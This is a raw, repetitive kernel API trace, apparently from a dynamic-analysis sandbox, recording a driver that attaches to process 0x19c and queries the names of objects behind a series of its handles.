[0264.819] PsAcquireProcessExitSynchronization () returned 0x0 [0264.819] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.819] ObReferenceObjectByHandle (in: Handle=0x244, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014935e980, HandleInformation=0x0) returned 0x0 [0264.819] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.820] PsReleaseProcessExitSynchronization () returned 0x2 [0264.820] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b5 [0264.820] ObQueryNameString (in: Object=0xffffc0014935e980, ObjectNameInfo=0xffffe0006a3f5044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f5044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.820] ObfDereferenceObject (Object=0xffffc0014935e980) returned 0x8003 [0264.820] IoCompleteRequest () returned 0x0 [0264.820] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.820] PsAcquireProcessExitSynchronization () returned 0x0 [0264.820] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.820] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001492a1b80, HandleInformation=0x0) returned 0x0 [0264.820] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.820] PsReleaseProcessExitSynchronization () returned 0x2 [0264.820] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b4 [0264.820] ObQueryNameString (in: Object=0xffffc001492a1b80, ObjectNameInfo=0xffffe0006843c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006843c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.820] ObfDereferenceObject (Object=0xffffc001492a1b80) returned 0x8000 [0264.820] IoCompleteRequest () returned 0x0 [0264.820] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.820] PsAcquireProcessExitSynchronization () returned 0x0 [0264.820] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.820] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014933caa0, HandleInformation=0x0) returned 0x0 [0264.820] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.820] PsReleaseProcessExitSynchronization () returned 0x2 [0264.820] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b3 [0264.820] ObQueryNameString (in: Object=0xffffc0014933caa0, ObjectNameInfo=0xffffe0006a0d0044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d0044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.820] ObfDereferenceObject (Object=0xffffc0014933caa0) returned 0x8000 [0264.820] IoCompleteRequest () returned 0x0 [0264.820] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.820] PsAcquireProcessExitSynchronization () returned 0x0 [0264.820] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.820] ObReferenceObjectByHandle (in: Handle=0x250, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014938d4c0, HandleInformation=0x0) returned 0x0 [0264.820] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.820] PsReleaseProcessExitSynchronization () returned 0x2 [0264.820] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b2 [0264.820] ObQueryNameString (in: Object=0xffffc0014938d4c0, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.820] ObfDereferenceObject (Object=0xffffc0014938d4c0) returned 0x8003 [0264.820] IoCompleteRequest () returned 0x0 [0264.820] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.820] PsAcquireProcessExitSynchronization () returned 0x0 [0264.820] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.820] ObReferenceObjectByHandle (in: Handle=0x254, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149353cd0, HandleInformation=0x0) returned 0x0 [0264.820] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.820] PsReleaseProcessExitSynchronization () returned 0x2 [0264.820] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b1 [0264.820] ObQueryNameString (in: Object=0xffffc00149353cd0, ObjectNameInfo=0xffffe0006a3f2044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f2044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.820] ObfDereferenceObject (Object=0xffffc00149353cd0) returned 0x8000 [0264.820] IoCompleteRequest () returned 0x0 [0264.821] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.821] PsAcquireProcessExitSynchronization () returned 0x0 [0264.821] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.821] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014935e1c0, HandleInformation=0x0) returned 0x0 [0264.821] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.821] PsReleaseProcessExitSynchronization () returned 0x2 [0264.821] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b0 [0264.821] ObQueryNameString (in: Object=0xffffc0014935e1c0, ObjectNameInfo=0xffffe00069197044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069197044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.821] ObfDereferenceObject (Object=0xffffc0014935e1c0) returned 0x8000 [0264.821] IoCompleteRequest () returned 0x0 [0264.821] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.821] PsAcquireProcessExitSynchronization () returned 0x0 [0264.821] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.821] ObReferenceObjectByHandle (in: Handle=0x25c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148cc6de0, HandleInformation=0x0) returned 0x0 [0264.821] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.821] PsReleaseProcessExitSynchronization () returned 0x2 [0264.821] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280af [0264.821] ObQueryNameString (in: Object=0xffffc00148cc6de0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.821] ObfDereferenceObject (Object=0xffffc00148cc6de0) returned 0x8003 [0264.821] IoCompleteRequest () returned 0x0 [0264.821] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.821] PsAcquireProcessExitSynchronization () returned 0x0 [0264.821] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.821] ObReferenceObjectByHandle (in: Handle=0x260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001479bea70, HandleInformation=0x0) returned 0x0 [0264.821] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.821] PsReleaseProcessExitSynchronization () returned 0x2 [0264.821] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280ae [0264.821] ObQueryNameString (in: Object=0xffffc001479bea70, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.821] ObfDereferenceObject (Object=0xffffc001479bea70) returned 0x8000 [0264.821] IoCompleteRequest () returned 0x0 [0264.821] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.821] PsAcquireProcessExitSynchronization () returned 0x0 [0264.821] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.821] ObReferenceObjectByHandle (in: Handle=0x264, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014938c920, HandleInformation=0x0) returned 0x0 [0264.821] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.821] PsReleaseProcessExitSynchronization () returned 0x2 [0264.821] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280ad [0264.821] ObQueryNameString (in: Object=0xffffc0014938c920, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.821] ObfDereferenceObject (Object=0xffffc0014938c920) returned 0x8000 [0264.821] IoCompleteRequest () returned 0x0 [0264.821] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.821] PsAcquireProcessExitSynchronization () returned 0x0 [0264.821] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.821] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149384ea0, HandleInformation=0x0) returned 0x0 [0264.822] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.822] PsReleaseProcessExitSynchronization () returned 0x2 [0264.822] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280ac [0264.822] ObQueryNameString (in: Object=0xffffc00149384ea0, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.822] ObfDereferenceObject (Object=0xffffc00149384ea0) returned 0x8000 [0264.822] IoCompleteRequest () returned 0x0 [0264.822] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.822] PsAcquireProcessExitSynchronization () returned 0x0 [0264.822] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.822] ObReferenceObjectByHandle (in: Handle=0x270, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014928f180, HandleInformation=0x0) returned 0x0 [0264.822] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.822] PsReleaseProcessExitSynchronization () returned 0x2 [0264.822] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280ab [0264.822] ObQueryNameString (in: Object=0xffffc0014928f180, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.822] ObfDereferenceObject (Object=0xffffc0014928f180) returned 0x8000 [0264.822] IoCompleteRequest () returned 0x0 [0264.822] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.822] PsAcquireProcessExitSynchronization () returned 0x0 [0264.822] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.822] ObReferenceObjectByHandle (in: Handle=0x274, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148e18060, HandleInformation=0x0) returned 0x0 [0264.822] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.822] PsReleaseProcessExitSynchronization () returned 0x2 [0264.822] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280aa [0264.822] ObQueryNameString (in: Object=0xffffc00148e18060, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.822] ObfDereferenceObject (Object=0xffffc00148e18060) returned 0x8000 [0264.822] IoCompleteRequest () returned 0x0 [0264.822] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.822] PsAcquireProcessExitSynchronization () returned 0x0 [0264.822] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.822] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001493281f0, HandleInformation=0x0) returned 0x0 [0264.822] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.822] PsReleaseProcessExitSynchronization () returned 0x2 [0264.822] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a9 [0264.822] ObQueryNameString (in: Object=0xffffc001493281f0, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.822] ObfDereferenceObject (Object=0xffffc001493281f0) returned 0x8000 [0264.822] IoCompleteRequest () returned 0x0 [0264.822] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.822] PsAcquireProcessExitSynchronization () returned 0x0 [0264.822] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.822] ObReferenceObjectByHandle (in: Handle=0x284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149302060, HandleInformation=0x0) returned 0x0 [0264.822] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.822] PsReleaseProcessExitSynchronization () returned 0x2 [0264.822] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a8 [0264.822] ObQueryNameString (in: Object=0xffffc00149302060, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.822] ObfDereferenceObject (Object=0xffffc00149302060) returned 0x8000 [0264.823] IoCompleteRequest () returned 0x0 [0264.823] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.823] PsAcquireProcessExitSynchronization () returned 0x0 [0264.823] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.823] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014937ae90, HandleInformation=0x0) returned 0x0 [0264.823] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.823] PsReleaseProcessExitSynchronization () returned 0x2 [0264.823] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a7 [0264.823] ObQueryNameString (in: Object=0xffffc0014937ae90, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.823] ObfDereferenceObject (Object=0xffffc0014937ae90) returned 0x8000 [0264.823] IoCompleteRequest () returned 0x0 [0264.823] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.823] PsAcquireProcessExitSynchronization () returned 0x0 [0264.823] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.823] ObReferenceObjectByHandle (in: Handle=0x290, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148ae7a70, HandleInformation=0x0) returned 0x0 [0264.823] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.823] PsReleaseProcessExitSynchronization () returned 0x2 [0264.823] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a6 [0264.823] ObQueryNameString (in: Object=0xffffc00148ae7a70, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.823] ObfDereferenceObject (Object=0xffffc00148ae7a70) returned 0x8000 [0264.823] IoCompleteRequest () returned 0x0 [0264.823] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.823] PsAcquireProcessExitSynchronization () returned 0x0 [0264.823] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.823] ObReferenceObjectByHandle (in: Handle=0x2b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149725060, HandleInformation=0x0) returned 0x0 [0264.823] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.823] PsReleaseProcessExitSynchronization () returned 0x2 [0264.823] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a5 [0264.823] ObQueryNameString (in: Object=0xffffc00149725060, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.823] ObfDereferenceObject (Object=0xffffc00149725060) returned 0x8003 [0264.823] IoCompleteRequest () returned 0x0 [0264.823] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.823] PsAcquireProcessExitSynchronization () returned 0x0 [0264.823] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.823] ObReferenceObjectByHandle (in: Handle=0x2b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149d11860, HandleInformation=0x0) returned 0x0 [0264.823] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.823] PsReleaseProcessExitSynchronization () returned 0x2 [0264.823] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a4 [0264.823] ObQueryNameString (in: Object=0xffffc00149d11860, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.823] ObfDereferenceObject (Object=0xffffc00149d11860) returned 0x8000 [0264.823] IoCompleteRequest () returned 0x0 [0264.823] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.823] PsAcquireProcessExitSynchronization () returned 0x0 [0264.823] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.824] ObReferenceObjectByHandle (in: Handle=0x2c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001497a3630, HandleInformation=0x0) returned 0x0 [0264.824] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.824] PsReleaseProcessExitSynchronization () returned 0x2 [0264.824] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a3 [0264.824] ObQueryNameString (in: Object=0xffffc001497a3630, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.824] ObfDereferenceObject (Object=0xffffc001497a3630) returned 0x8000 [0264.824] IoCompleteRequest () returned 0x0 [0264.824] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.824] PsAcquireProcessExitSynchronization () returned 0x0 [0264.824] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.824] ObReferenceObjectByHandle (in: Handle=0x2cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148c079f0, HandleInformation=0x0) returned 0x0 [0264.824] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.826] PsReleaseProcessExitSynchronization () returned 0x2 [0264.826] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a2 [0264.826] ObQueryNameString (in: Object=0xffffc00148c079f0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.826] ObfDereferenceObject (Object=0xffffc00148c079f0) returned 0x8000 [0264.826] IoCompleteRequest () returned 0x0 [0264.826] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.826] PsAcquireProcessExitSynchronization () returned 0x0 [0264.826] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.826] ObReferenceObjectByHandle (in: Handle=0x2d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014979e5c0, HandleInformation=0x0) returned 0x0 [0264.826] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.826] PsReleaseProcessExitSynchronization () returned 0x2 [0264.826] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a1 [0264.826] ObQueryNameString (in: Object=0xffffc0014979e5c0, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.826] ObfDereferenceObject (Object=0xffffc0014979e5c0) returned 0x8000 [0264.826] IoCompleteRequest () returned 0x0 [0264.826] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.826] PsAcquireProcessExitSynchronization () returned 0x0 [0264.826] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.826] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001497d4c80, HandleInformation=0x0) returned 0x0 [0264.826] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.826] PsReleaseProcessExitSynchronization () returned 0x2 [0264.826] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280a0 [0264.826] ObQueryNameString (in: Object=0xffffc001497d4c80, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.826] ObfDereferenceObject (Object=0xffffc001497d4c80) returned 0x8000 [0264.826] IoCompleteRequest () returned 0x0 [0264.826] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.826] PsAcquireProcessExitSynchronization () returned 0x0 [0264.826] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.826] ObReferenceObjectByHandle (in: Handle=0x2d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014892cfc0, HandleInformation=0x0) returned 0x0 [0264.826] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.826] PsReleaseProcessExitSynchronization () returned 0x2 [0264.826] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x2809f [0264.826] ObQueryNameString (in: Object=0xffffc0014892cfc0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.826] ObfDereferenceObject (Object=0xffffc0014892cfc0) returned 0x8000 [0264.826] IoCompleteRequest () returned 0x0 [0264.826] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.826] PsAcquireProcessExitSynchronization () returned 0x0 [0264.826] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.827] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149712270, HandleInformation=0x0) returned 0x0 [0264.827] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) 